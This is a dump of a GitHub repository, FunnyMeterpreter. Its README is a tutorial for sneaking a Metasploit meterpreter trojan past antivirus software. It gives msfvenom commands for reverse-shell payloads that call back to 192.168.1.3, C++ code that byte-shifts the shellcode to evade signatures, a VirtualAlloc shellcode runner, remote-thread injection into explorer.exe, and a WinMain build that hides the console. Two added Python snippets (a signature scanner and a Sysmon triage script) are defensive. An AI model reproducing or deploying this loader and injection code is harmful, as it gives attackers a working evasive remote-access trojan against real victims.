├── images
│   ├── vs1.png
│   ├── vs2.png
│   ├── vs3.png
│   ├── vs4.jpg
│   ├── vs5.png
│   ├── vs6.png
│   ├── vs7.png
│   ├── vs8.png
│   ├── ser1.png
│   ├── ser2.jpg
│   ├── sharuan1.jpg
│   ├── sharuan2.jpg
│   ├── shell1.png
│   ├── shell2.png
│   ├── shell3.png
│   ├── shell4.png
│   ├── shell5.png
│   ├── shell6.png
│   ├── shell7.png
│   └── shell8.jpg
├── FunnyMeterpreter
│   ├── main.cc
│   ├── FunnyMeterpreter.vcxproj.filters
│   └── FunnyMeterpreter.vcxproj
├── FunnyMeterpreter.sln
├── .gitattributes
├── .gitignore
└── README.md
/FunnyMeterpreter/main.cc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/FunnyMeterpreter/main.cc
--------------------------------------------------------------------------------
/FunnyMeterpreter/FunnyMeterpreter.vcxproj.filters:
--------------------------------------------------------------------------------
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx

{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;hm;inl;inc;ipp;xsd

{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms

源文件
--------------------------------------------------------------------------------
/FunnyMeterpreter.sln:
--------------------------------------------------------------------------------
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.28010.2048
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FunnyMeterpreter", "FunnyMeterpreter\FunnyMeterpreter.vcxproj", "{ED696FB8-16A7-4171-9108-28166B74B403}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|x64 = Debug|x64
		Debug|x86 = Debug|x86
		Release|x64 = Release|x64
		Release|x86 = Release|x86
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{ED696FB8-16A7-4171-9108-28166B74B403}.Debug|x64.ActiveCfg = Debug|x64
		{ED696FB8-16A7-4171-9108-28166B74B403}.Debug|x64.Build.0 = Debug|x64
		{ED696FB8-16A7-4171-9108-28166B74B403}.Debug|x86.ActiveCfg = Debug|Win32
		{ED696FB8-16A7-4171-9108-28166B74B403}.Debug|x86.Build.0 = Debug|Win32
		{ED696FB8-16A7-4171-9108-28166B74B403}.Release|x64.ActiveCfg = Release|x64
		{ED696FB8-16A7-4171-9108-28166B74B403}.Release|x64.Build.0 = Release|x64
		{ED696FB8-16A7-4171-9108-28166B74B403}.Release|x86.ActiveCfg = Release|Win32
		{ED696FB8-16A7-4171-9108-28166B74B403}.Release|x86.Build.0 = Release|Win32
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {0995D11B-803A-4319-847B-A07B47D003DA}
	EndGlobalSection
EndGlobal
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
###############################################################################
# Set default behavior to automatically normalize line endings.
###############################################################################
* text=auto

###############################################################################
# Set default behavior for command prompt diff.
#
# This is needed for earlier builds of msysgit that do not have it on by
# default for csharp files.
# Note: This is only used by command line
###############################################################################
#*.cs diff=csharp

###############################################################################
# Set the merge driver for project and solution files
#
# Merging from the command prompt will add diff markers to the files if there
# are conflicts (Merging from VS is not affected by the settings below, in VS
# the diff markers are never inserted). Diff markers may cause the following
# file extensions to fail to load in VS. An alternative would be to treat
# these files as binary and thus will always conflict and require user
# intervention with every merge. To do so, just uncomment the entries below
###############################################################################
#*.sln merge=binary
#*.csproj merge=binary
#*.vbproj merge=binary
#*.vcxproj merge=binary
#*.vcproj merge=binary
#*.dbproj merge=binary
#*.fsproj merge=binary
#*.lsproj merge=binary
#*.wixproj merge=binary
#*.modelproj merge=binary
#*.sqlproj merge=binary
#*.wwaproj merge=binary

###############################################################################
# behavior for image files
#
# image files are treated as binary by default.
###############################################################################
#*.jpg binary
#*.png binary
#*.gif binary

###############################################################################
# diff behavior for common document formats
#
# Convert binary document formats to text before diffing them. This feature
# is only available from the command line. Turn it on by uncommenting the
# entries below.
###############################################################################
#*.doc diff=astextplain
#*.DOC diff=astextplain
#*.docx diff=astextplain
#*.DOCX diff=astextplain
#*.dot diff=astextplain
#*.DOT diff=astextplain
#*.pdf diff=astextplain
#*.PDF diff=astextplain
#*.rtf diff=astextplain
#*.RTF diff=astextplain
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.

# User-specific files
*.suo
*.user
*.userosscache
*.sln.docstates

# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs

# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/

# Visual Studio 2015 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/

# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*

# NUNIT
*.VisualState.xml
TestResult.xml

# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c

# DNX
project.lock.json
project.fragment.lock.json
artifacts/

*_i.c
*_p.c
*_i.h
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc

# Chutzpah Test files
_Chutzpah*

# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb

# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap

# TFS 2012 Local Workspace
$tf/

# Guidance Automation Toolkit
*.gpState

# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user

# JustCode is a .NET coding add-in
.JustCode

# TeamCity is a build add-in
_TeamCity*

# DotCover is a Code Coverage Tool
*.dotCover

# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*

# MightyMoose
*.mm.*
AutoTest.Net/

# Web workbench (sass)
.sass-cache/

# Installshield output folder
[Ee]xpress/

# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html

# Click-Once directory
publish/

# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# TODO: Comment the next line if you want to checkin your web deploy settings
# but database connection strings (with potential passwords) will be unencrypted
#*.pubxml
*.publishproj

# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/

# NuGet Packages
*.nupkg
# The packages folder can be ignored because of Package Restore
**/packages/*
# except build/, which is used as an MSBuild target.
!**/packages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/packages/repositories.config
# NuGet v3's project.json files produce more ignorable files
*.nuget.props
*.nuget.targets

# Microsoft Azure Build Output
csx/
*.build.csdef

# Microsoft Azure Emulator
ecf/
rcf/

# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt

# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!*.[Cc]ache/

# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
node_modules/
orleans.codegen.cs

# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/

# RIA/Silverlight projects
Generated_Code/

# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm

# SQL Server files
*.mdf
*.ldf

# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings

# Microsoft Fakes
FakesAssemblies/

# GhostDoc plugin setting file
*.GhostDoc.xml

# Node.js Tools for Visual Studio
.ntvs_analysis.dat

# Visual Studio 6 build log
*.plg

# Visual Studio 6 workspace options file
*.opt

# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions

# Paket dependency manager
.paket/paket.exe
paket-files/

# FAKE - F# Make
.fake/

# JetBrains Rider
.idea/
*.sln.iml

# CodeRush
.cr/

# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc
--------------------------------------------------------------------------------
/FunnyMeterpreter/FunnyMeterpreter.vcxproj:
--------------------------------------------------------------------------------
Debug
Win32

Release
Win32

Debug
x64

Release
x64

15.0
{ED696FB8-16A7-4171-9108-28166B74B403}
FunnyMeterpreter
10.0.17134.0

Application
true
v141
MultiByte

Application
false
v141
true
MultiByte

Application
true
v141
MultiByte

Application
false
v141
true
MultiByte

Level3
Disabled
true
true

Level3
Disabled
true
true

Level3
MaxSpeed
true
true
true
true

true
true

Level3
MaxSpeed
true
true
true
true

true
true
Windows
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Daily Scuffles with the Antivirus Big Brothers
If you find this inspiring, please consider giving it a `star`.
## Preface
Graduation is approaching. In an interview not long ago the handsome interviewer and I got to talking about AV evasion, and I answered with kernel hooks, user-mode hooks and hand-rolled API functions...

## Environment
1. VMware Workstation Pro 15
2. Windows 10
3. Windows Server 2008 R2
4. Visual Studio 2017 (C++ development environment)
5. Ubuntu 18.04.1 LTS
6. Metasploit

## Let the Scuffle Begin
### Generating a plain Windows x64 meterpreter
```shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=8844 -f exe -o hack.exe
```


This is the simplest way to generate a `meterpreter` trojan, and it is easy to predict that a binary generated this directly will be mercilessly flattened by the AV.


### Generating meterpreter shellcode
```shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=8844 -f c
```


### Creating a new project in Visual Studio 2017
1. For the project type choose Visual C++ Empty Project
2. Name the project `meterpreter`



### Processing the shellcode
The key to not being blocked by the AV lies in modifying the shellcode. Antivirus software decides whether an executable is malicious by matching binary signatures, and the meterpreter shellcode we generated is, without question, already in the AV vendors' signature databases.

#### The encrypt_shellcode function
Here we write a function of our own to do some simple processing on the `shellcode` we just generated.
```cpp
#include <cstdlib>
#include <iomanip>
#include <iostream>

void encrypt_shellcode(unsigned char* shellcode, size_t size) {
    // simple encryption
    for (size_t i = 0; i < size - 1; i++) {
        if (shellcode[i] == 0x00) {
            shellcode[i] += 0x05;
        } else {
            if ((shellcode[i] - 0x01) != 0x05) {
                shellcode[i] -= 0x01;
            }
        }
    }
    // print the result as a C byte string
    for (size_t i = 0; i < size - 1; i++) {
        std::cout << std::hex << "\\x"
                  << std::setfill('0')
                  << std::setw(2)
                  << (unsigned int)shellcode[i];
    }
    std::cout << std::endl;
}

int main() {
    unsigned char shellcode[] = "...";
    encrypt_shellcode(shellcode, sizeof(shellcode));
    system("pause");
    return 0;
}
```
The `encrypt_shellcode` function applies a simple encryption to the shellcode:
1. Iterate over every byte of the shellcode except the trailing `\0`
2. If the current byte equals `0x00`, add `0x05` to it
3. For every other byte (not `0x00`), subtract `0x01` from it, unless the byte minus `0x01` would equal `0x05`
4. Print the result



#### The decrypt_shellcode function
```cpp
// shellcode decryption function
void decrypt_shellcode(unsigned char* shellcode, size_t size) {
    // decrypt the shellcode
    for (size_t i = 0; i < size - 1 /* the last byte is the \0, so it needs no decryption */; i++) {
        if (shellcode[i] == 0x05) {
            shellcode[i] = 0x00;
        } else {
            shellcode[i] += 0x01;
        }
    }
}
```
The decryption function is not hard to follow: it is simply the reverse of the encryption.
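An added defender-side example, not code from this repository: a signature scanner that looks for the opening bytes of the stock msfvenom `windows/x64` stager both as-is and after pushing the byte-shift transform above onto the signature itself, so the raw file is searched once per known transform and reported offsets are real file offsets. The prologue constant is the stock stager's first instructions; the scanned blob and the transform table are constructed here.

```python
"""Signature scan that sees through the per-byte shift used by encrypt_shellcode."""
from __future__ import annotations

# Opening bytes of the stock Metasploit x64 stager (cld; and rsp,-0x10; call ...).
STAGER_PROLOGUE = bytes.fromhex("fc4883e4f0e8c0000000")


def shift_encode(data: bytes) -> bytes:
    """Reproduce the page's encrypt_shellcode byte mapping: 0x00 -> 0x05,
    every other byte -1, except a byte that would land on 0x05, which is
    left unchanged (assumption: same rules as the C++ above)."""
    out = bytearray()
    for b in data:
        if b == 0x00:
            out.append(0x05)
        elif b - 0x01 != 0x05:
            out.append((b - 0x01) & 0xFF)
        else:
            out.append(b)
    return bytes(out)


# Each entry transforms the *signature*, not the file: any byte-wise mapping
# can be applied to the needle, so one pass per transform over the raw bytes
# suffices.  A keyed or stream transform could not be handled this way.
SIGNATURE_TRANSFORMS = {
    "plain": lambda sig: sig,
    "page-shift": shift_encode,
}


def scan(blob: bytes, signature: bytes = STAGER_PROLOGUE) -> list[tuple[str, int]]:
    """Return (transform name, offset) for every occurrence of the signature,
    in plain or transformed form, inside blob."""
    hits = []
    for name, transform in SIGNATURE_TRANSFORMS.items():
        needle = transform(signature)
        idx = blob.find(needle)
        while idx != -1:
            hits.append((name, idx))
            idx = blob.find(needle, idx + 1)
    return hits


# Constructed sample: a fake header, 64 filler bytes, the prologue as
# encrypt_shellcode would emit it, then zero padding.
SAMPLE_BLOB = (
    b"MZ" + bytes(range(0x20, 0x60))
    + shift_encode(STAGER_PROLOGUE)
    + b"\x00" * 16
)

if __name__ == "__main__":
    for name, offset in scan(SAMPLE_BLOB):
        print(f"{name}: stager prologue at offset {offset:#x}")
```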

### Executing the shellcode
We encrypt the shellcode mainly to escape the AV's signature search, but shellcode processed this way obviously cannot run as-is, so we wrote the `decrypt_shellcode` function: we carry the processed shellcode around and simply decrypt it when we want to execute it, after which it runs normally.
```cpp
#include <windows.h>
#include <cstdlib>
#include <cstring>

int main() {
    unsigned char shellcode[] = "...";  // the processed shellcode
    // decrypt the shellcode
    decrypt_shellcode(shellcode, sizeof(shellcode));
    typedef void(__cdecl * Func)();
    void* p = ::VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    // copy shellcode to p
    memcpy(p, shellcode, sizeof(shellcode));
    Func code = (Func)p;
    code();
    system("pause");
    return 0;
}
```
There are many ways to execute shellcode; this is just one of them, and if you are interested you can ask Baidu about the others. Here we switch the project to the Release x64 configuration and build it.



Scan the compiled program with the AV.


Now we set up a listener and run the compiled trojan; it does call back with a shell successfully, you can try it yourself, but our trojan still has a few small blemishes [grin].

### Injecting the shellcode into another program for execution
Shellcode injection was a spur-of-the-moment idea of mine; running the shellcode directly without injection works just as well.
```cpp
#include <windows.h>
#include <tlhelp32.h>
#include <string>

// look up a PID by process name
unsigned int get_pid(const std::string& process_name) {
    PROCESSENTRY32 pe32;
    HANDLE hProcSnap = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcSnap == INVALID_HANDLE_VALUE) {
        return 0;
    }
    pe32.dwSize = sizeof(PROCESSENTRY32);
    // walk the process list
    for (BOOL ret = Process32First(hProcSnap, &pe32); ret;
         ret = Process32Next(hProcSnap, &pe32)) {
        if (process_name == pe32.szExeFile) {
            CloseHandle(hProcSnap);
            return pe32.th32ProcessID;
        }
    }
    CloseHandle(hProcSnap);
    return 0;
}

// injection function (decrypt_shellcode is the function defined above)
bool inject_shellcode(unsigned int pid, unsigned char* shellcode, size_t size) {
    // decrypt the shellcode
    decrypt_shellcode(shellcode, size);
    HANDLE hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    // failed to obtain a process handle (OpenProcess returns NULL on failure)
    if (hProcess == NULL) return false;
    auto inject_address =
        ::VirtualAllocEx(hProcess, NULL, size, MEM_COMMIT | MEM_RESERVE,
                         PAGE_EXECUTE_READWRITE);
    // VirtualAllocEx failed
    if (inject_address == NULL) return false;
    // write the shellcode into the remote process
    ::WriteProcessMemory(hProcess, inject_address, (PVOID)shellcode, size, NULL);
    HANDLE hThread = ::CreateRemoteThread(
        hProcess, 0, 0, (LPTHREAD_START_ROUTINE)inject_address, NULL, 0, NULL);
    ::WaitForSingleObject(hThread, INFINITE);
    ::CloseHandle(hThread);
    ::VirtualFreeEx(hProcess, inject_address, 0, MEM_RELEASE);
    ::CloseHandle(hProcess);
    return true;
}
```
The injection function is the classic remote-thread injection; don't worry if you can't follow it, shellcode injection is not the point here.
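An added defender-side example, not code from this repository: triage of CreateRemoteThread telemetry against the injection sequence above (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread into `explorer.exe`). The records carry the fields Sysmon Event ID 8 reports (SourceImage, TargetImage, StartAddress, StartModule, StartFunction); the sample records, their paths and the host-process list are constructed for the demo.

```python
"""Flag remote-thread events that match the page's injector pattern."""
from __future__ import annotations
from dataclasses import dataclass


@dataclass(frozen=True)
class RemoteThreadEvent:
    source_image: str    # process that called CreateRemoteThread
    target_image: str    # process the thread was created in
    start_address: int
    start_module: str    # "" when the start address is inside no loaded module
    start_function: str


# Host processes loaders commonly pick (assumed list for the demo).
COMMON_INJECTION_HOSTS = {"explorer.exe", "svchost.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(ev: RemoteThreadEvent) -> list[str]:
    """Return the reasons an event resembles the sequence shown above;
    an empty list means nothing stood out."""
    reasons = []
    if not ev.start_module:
        # A region from VirtualAllocEx is private memory with no backing
        # module, which is exactly what inject_shellcode starts a thread in.
        reasons.append("thread start address is not backed by a loaded module")
    if _basename(ev.target_image) in COMMON_INJECTION_HOSTS:
        reasons.append(f"target {_basename(ev.target_image)} is a common injection host")
    if not ev.source_image.lower().startswith("c:\\windows\\"):
        reasons.append("source image lives outside the Windows directory")
    return reasons


def is_suspicious(ev: RemoteThreadEvent) -> bool:
    """Unbacked start address alone is enough; otherwise require two signals."""
    reasons = triage(ev)
    return any("not backed" in r for r in reasons) or len(reasons) >= 2


# Constructed records: the first mirrors the page's WinMain injecting into
# explorer.exe from a user-dropped binary; the second is a thread whose start
# lies in ntdll, the shape legitimate tooling produces.
SAMPLE_EVENTS = [
    RemoteThreadEvent(r"C:\Users\demo\Downloads\hack.exe", r"C:\Windows\explorer.exe",
                      0x1A2B0000, "", ""),
    RemoteThreadEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\explorer.exe",
                      0x7FF812345678, r"C:\Windows\System32\ntdll.dll",
                      "RtlUserThreadStart"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        verdict = "SUSPICIOUS" if is_suspicious(ev) else "ok"
        print(f"{verdict}: {ev.source_image} -> {ev.target_image}: {triage(ev)}")
```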

### Removing the command-prompt window
If you have run the trojan we generated, you will have noticed a conspicuous black window that blinds you.
Now we remove that command-prompt window so our trojan runs discreetly.

We change the program to build as a `SUBSYSTEM:WINDOWS` windowed application and change the entry point to `WinMain`; the program then runs without a command prompt.

```cpp
int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance,
                   _In_ LPSTR lpCmdLine, _In_ int nShowCmd) {
    unsigned char shellcode[] = "...";  // the encrypted shellcode

    const unsigned int explorer_pid = get_pid("explorer.exe");
    // the injection function decrypts the shellcode internally
    inject_shellcode(explorer_pid, shellcode, sizeof(shellcode));

    return 0;
}
```
Anyone with Windows programming experience will know that once we have written `WinMain`, the `main` function can be deleted.

Here I use remote shellcode injection into the `explorer.exe` process to run our trojan. You can also use the earlier method.

### Generating meterpreter shellcode with RC4-encrypted communication
```shell
msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST=192.168.1.3 LPORT=8844 RC4PASSWORD=ncvt -f c
```


While looking things up I found that RC4-encrypted communication apparently helps to prevent the AV's dynamic blocking. Whatever the case, it is just a matter of swapping the shellcode: run the new shellcode through the `encrypt_shellcode` function and that is all.

### Starting the meterpreter listener on Ubuntu 18.04
The parameters are just those shown below; the payload used is `windows/x64/meterpreter/reverse_tcp_rc4`.
Remember to set `RC4PASSWORD`.


Good, we start the listener with `exploit`.

### Running the trojan on Windows Server 2008 R2
We switch to `Windows Server 2008` to run our compiled trojan, and switch to a different AV as well.


Drop the trojan into the VM and scan it with the AV.


Run the trojan; it is not blocked. We switch back to `Ubuntu 18.04`.


The meterpreter shell called back successfully.


A screenshot:




## Summary of the experiment
I have been playing with web security for so long that it is quite surprising my first article turns out to be about AV evasion. It took a little under half an afternoon of research, and as you readers can see, the shellcode-processing method I wrote is rather crude, haha!
There is far more to AV evasion than this little bit; the scuffle with the big brothers ends here for now, because one really shouldn't spend one's energy on this kind of petty rubbish. This junior is off to write code~

## Source code
Remember to rebuild the solution.
GitHub: https://github.com/dothook/ZiYuanFenXiang Please give it a `Star`.
```shell
git clone https://github.com/dothook/FunnyMeterpreter.git
```


## Addendum
Very important!!!
Because the program may need Windows DLL interfaces, be sure to generate the code in `MT` mode, so the program is linked statically and does not depend on the VC runtime libraries.


--------------------------------------------------------------------------------